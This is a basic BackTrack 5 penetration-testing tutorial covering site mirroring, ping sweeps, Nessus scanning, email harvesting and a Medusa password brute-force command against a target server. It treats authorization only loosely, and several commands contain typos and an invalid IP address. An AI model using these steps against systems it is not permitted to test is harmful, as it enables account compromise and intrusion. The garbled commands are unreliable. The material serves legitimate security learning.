Download link – www.backtrack-linux.org/downloads
backtrack 5 tutorial :-
BackTrack was a Linux distribution, superseded by Kali Linux, that focused on security based on the Ubuntu Linux distribution aimed at digital forensics and penetration testing use. In March 2013, the Offensive Security team rebuilt BackTrack around the Debian distribution and released it under the name Kali Linux.
BackTrack provided users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to Security Audit. Support for Live CD and Live USB functionality allowed users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk and network was also an option.
BackTrack included many well known security tools including:
- Metasploit for integration
- Wi-Fi drivers supporting monitor mode (rfmon mode) and packet injection
- Aircrack-ng
- Gerix Wifi Cracker
- Kismet
- Nmap
- Ophcrack
- Ettercap
- Wireshark (formerly known as Ethereal)
- BeEF (Browser Exploitation Framework)
- Hydra
- OWASP Mantra Security Framework, a collection of hacking tools, add-ons and scripts based on Firefox
- Cisco OCS Mass Scanner, a very reliable and fast scanner for Cisco routers with telnet and enabling of a default password.
- A large collection of exploits as well as more commonplace software such as browsers.
BackTrack arranged tools into 12 categories:
- Information gathering
- Vulnerability assessment
- Exploitation tools
- Privilege escalation
- Maintaining access
- Reverse engineering
- RFID tools
- Stress testing
- Forensics
- Reporting tools
- Services
- Miscellaneous
>> penetration testing with Backtrack 5
Step 1 – Surveillance
Before we get going with the actual penetration testing, we want to install a free program called “HTTrack” via the Backtrack 5 console. To do this, open Backtrack 5 and enter “sudo apt=get install httrack” and get ready for the next step. Once that’s done, go ahead and type in “httrack” into the console to pull it up. Now, in case you’re wondering, this program will allow us to index all of the pages on a given site before we start the actual penetration testing process. This means that you won’t have to be digging around through some site live and wasting precious time. You also don’t assume the risk of getting kicked off of the server before you get what you need. If that were to happen, you’d need to install this tool anyways so it’s best to play it safe and use it from the beginning.
Next, you will give your path a name (you can leave it blank if you want) and you will enter a website to copy. Once you do that and hit enter, you’ll be given a list of options. To copy the entire website, you’ll simply hit “1” on your keyboard. Give it a few minutes and you’ll have duplicates of the entire site’s contents downloaded.
There are also tools available for download that will let you repeat this process but for sub-domains and emails. We aren’t going to cover that here in this lesson but that’s because it is more of a convenience and isn’t completely necessary. With that being said, it’s about time we move on to Step 2!
Step 2 – Scan The Site
Step 2 forgetting hacking practice is also our favorite step. It’s the actual scanning process and quite frankly, it’s the least complicated step (or one of them). So, the first way to scan the site in question is with a Ping Sweep. To do this, you’ll want to enter the following code into the terminal and wait for the results.
The code: fping –a –g 123.12.12.1 321.32.21.1>hosts.txt
Now, in that code, you’ll notice something strange. There are random numbers in there. Okay, those are sample IP addresses. They aren’t real IP addresses to real sites so you’ll want to replace those with the IP address of a real site (the site you are performing penetration testing on). Essentially, what the Ping Sweet does is it sweeps and scans all the IP addresses from IP address A to IP address B. Make sense?
Once you have these results, we recommend running a vulnerability scan. To do this, enter this code:
“root@bt:~# apt-get install nessus”
Once you have this installed, you can run it by doing the following: Click Applications, Backtrack, Vulnerability Assessment, Vulnerability Scanner, Nessus, and finally, Nessus Start. Then, you wait.
Before you move on to Step 3, we have an additional recommendation that isn’t necessary but it will help. You can easily catalog both email addresses and sub-domains that are associated with the website in question as well with a simple, easy to use Python script called “The Harvester.” To get this on your Backtrack 5 system, you will simply need to type in the following code into your console to get going:
root@bt:~# cd /pentest/enumeration/theharvester
root@bt:~# ./the Harvester.py –d (your site here) -1 10 –b google.com
Now, you see where we entered Google’s web url? You can literally use any search engine that you want there whether it’s Yahoo, Bing, or MSN. Basically what this function does is searches a public resource (a search engine) for emails and sub-domains associated with the address you enter in the code above. Again, this isn’t necessary but it will give you additional information on the site and additional resources that will come in handy when it comes time to start the exploitation process. Now, ready to move on?
Step 3 – Exploit The Site In Question
Now we’re at the stage in the game where we’re going to attempt to exploit the site which is probably what most of you have been waiting for. In other words, it’s crunch time! So, the first thing that you need to do is ensure that you have Medusa installed. Backtrack 5 comes with Medusa pre-installed but just in case it isn’t, here is what you can do. Open your console and type “apt-get update.” Once you’ve done that then you’ll also want to type in “apt-get install medusa.” That should take care of it for you.
Now, before we move on, keep one thing in mind. Some networks will lock you out if you have too many guesses as to what the password is. In order to better your chances and hopefully avoid this, type in the following: /pentest/passwords/wordlists. This is basically a word list that you can use when you run the Medusa program to guess passwords. To get started, enter the code listed below to exploit the server.
“medusa –h target ip –u username –P path to password dictionary –M service to attack”
To make better sense of what you’re reading above, we’re going to explain it and break it down for you. The –h is used to target the IP of the site or its host (many people use Shared IP addresses now).
The –u is for usernames that will be used in attempts to log in. The –P is going to specify an entire list of possible passwords and the –M is going to be used to target a specific service that will be attacked. While this may sound pretty complicated to those of you who have never used Backtrack 5 and are coming to this tutorial with no experience whatsoever, it really isn’t that complicated. It will take a little practice but after a few attempts (hopefully you’re using your own website), you’ll get it down. Now, once you’ve messed with this some and have at least got familiar with it, move on to Step 4.
Step 4 – Compile Results
Now that you’ve went through the first 3 basic steps from Surveillance to Exploiting the Site, you’re ready to start compiling basic information and results. Were you able to access the server or website in question? Were you locked out because of too many password attempts? Were you able to get around that? These are all questions that you should ask yourself when using Backtrack 5. As mentioned above, this will take a little practice and some getting used to but it’s not a hard piece of software to master.
Best of all, it’s a very valuable piece of software that could potentially save you or your business a lot of money later on down the road. If you can access your own website or server with Backtrack 5 then that means you’re at high risk of being hacked. If you store credit card numbers or secretive information on your site, you definitely don’t want this to happen. While this is only a basic Backtrack 5 tutorial that just outlines the bare essentials of using the software, there is still a lot to learn. Whether you decide to seek outquality backtrack 5 lesson or learn yourself, you’ll find it to be a very rewarding, challenging, and technical experience. On top of that, you’ll also learn logical security practices that will enable you to keep your sites and networks safe from hackers.
root@bt:~# apt-get update && apt-get upgrade && apt-get dist-upgrade
This will ensure that you have all the necessary updates and you’re ready to go the next time you use the software. Many people overlook this step but just like we said above, we think it’s a pretty serious step to take. The updates are absolutely free and there’s literally no good excuse not to take advantage of them. They could come in handy later on down the road and you never know what new updates that will be coming out for Backtrack 5. Since the updates are based on Ubuntu updates, you’ll find that they do come out pretty often. As mentioned above, you may want to do this multiple times a week but for the most part, these updates are quick.
So, with that being said, put in that command before each session of Backtrack 5. This may not get you the updates as soon as they come out but it will ensure that you’re up to date before you use the software. Sound simple enough? That’s because it most definitely is! Now, all that’s left to do is polish your skills, keep your software updated, and go get to work!